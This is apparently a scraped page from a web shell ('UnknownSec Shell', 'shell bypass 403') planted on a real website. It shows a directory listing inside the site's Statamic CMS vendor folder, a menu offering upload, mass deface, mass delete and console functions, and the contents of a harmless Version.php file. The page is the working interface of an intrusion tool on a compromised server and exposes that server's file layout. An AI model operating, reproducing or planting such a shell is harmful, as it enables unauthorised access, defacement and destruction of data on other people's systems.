shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Version.php
<?php namespace Statamic; use Facades\Statamic\Console\Processes\Composer; class Version { public function get() { $currentVersion = Composer::installedVersion(Statamic::PACKAGE); if (! $currentVersion) { throw new \Exception('Statamic version could not be found. The composer.lock file is missing.'); } return $currentVersion; } }
© 2026 UnknownSec